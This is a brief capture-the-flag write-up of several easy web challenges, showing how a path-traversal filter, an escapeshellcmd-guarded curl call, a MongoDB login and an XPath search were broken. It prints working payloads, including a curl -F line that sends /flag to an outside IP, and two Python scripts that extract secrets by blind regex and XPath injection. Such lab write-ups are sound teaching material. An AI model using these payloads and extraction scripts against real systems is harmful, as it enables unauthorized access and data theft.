Preface
This isn't really a writeup and is fairly thin; it just records my rough approach to the challenges. I had too much going on these past few days and didn't have much time to play, so I only did these few easy ones.
Inspector Gadget
Opening the page shows CHTB{. Pressing F12 reveals a main.js whose first line is:
console.log("us3full_1nf0rm4tion}");
So the flag is CHTB{us3full_1nf0rm4tion}
MiniSTRyplace
Download the source and audit it. The very first line of PHP code already looks wrong:
include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));
A single str_replace is not enough; arbitrary file read is still possible, because the replacement runs only once and the leftover pieces re-form ../:
?lang=..././..././flag
Fairly simple.
Caas
Key code:
$router->new('POST', '/api/curl', 'CurlController@execute');

public function __construct($url)
{
    // escapeshellcmd neutralises shell metacharacters, not spaces
    $this->command = "curl -sL " . escapeshellcmd($url);
}

public function exec()
{
    exec($this->command, $output);
    return $output;
}
It runs a curl command, but the URL goes through escapeshellcmd.
Looking that up: escapeshellcmd escapes shell metacharacters, so a second command cannot be chained on, but it leaves spaces alone, so extra arguments can still be appended to the curl command line.
Read the flag directly (curl's -F posts /flag as a form field to the listed host):
ip= -F password=@/flag http://118.31.168.198:39543/
Wild Goose Hunt
Download the source; it's Node.js. From the contents of entrypoint.sh:
mongo heros --eval "db.createCollection('users')"
mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'
So the flag is in the collection, stored as the password of the admin user. The backend uses MongoDB; the login query:
router.post('/api/login', (req, res) => {
    let { username, password } = req.body;
    if (username && password) {
        return User.find({
            username,
            password
        })
        .then((user) => {
            if (user.length == 1) {
                return res.json({logged: 1, message: `Login Successful, welcome back ${user[0].username}.` });
            } else {
                return res.json({logged: 0, message: 'Login Failed'});
            }
        })
        .catch(() => res.json({ message: 'Something went wrong'}));
    }
    return res.json({ message: 'Invalid username or password'});
});
My first thought was SQL injection; I vaguely remembered that for MongoDB this is NoSQL injection, but had forgotten the details, so I re-read an earlier article on NoSQL:
NoSQL injection
The plan is to extract the password. I use $regex matching for a boolean-based injection. Script:
import requests

url = "http://139.59.174.238:31693/api/login"
headers = {
    'Content-Type': 'application/json'
}
# Known prefix; the brace is escaped because it is sent as part of a regex
flag = r"CHTB\\{"
# req.body is passed straight to find(), so {"$regex": ...} objects are accepted
data = '{"username": {"$regex": "admin"},"password": {"$regex": "^%s.*"}}'
for i in range(60):
    for j in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-":
        if j == "}":
            j = r"\\}"  # escape the closing brace for the regex
        r = requests.post(url=url, data=data % (flag + j), headers=headers)
        if "Successful" in r.text:
            flag += j
            print(flag)
            if j == r"\\}":
                exit()  # closing brace found: the flag is complete
            break
E.Tree
The attachment is an XML file, and the flag is split into two pieces inside it, so I guessed XPath injection. It's been a long time since I did XPath injection and I forgot how, so reference article:
XPath injection
Write a script to brute it:
import requests

url = "http://178.62.14.240:30145/api/search"
# Boolean-based XPath injection: the expression is true only when the i-th
# character of selfDestructCode equals the guessed character
data1 = "{\"search\":\"'or substring(/military/district[position()=2]/staff[position()=3]/selfDestructCode,%s,1)='%s' or'\"}"
data2 = "{\"search\":\"'or substring(/military/district[position()=3]/staff[position()=2]/selfDestructCode,%s,1)='%s' or'\"}"
headers = {
    'Content-Type': 'application/json'
}
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-"

flag = ""
for data in (data1, data2):  # the flag is split across two staff nodes
    for i in range(1, 50):
        for j in charset:
            r = requests.post(url=url, headers=headers, data=data % (i, j))
            if "This millitary staff member exists" in r.text:
                flag += j
                print(flag)
                break
        else:
            break  # no character matched at this position: end of this half
print(flag)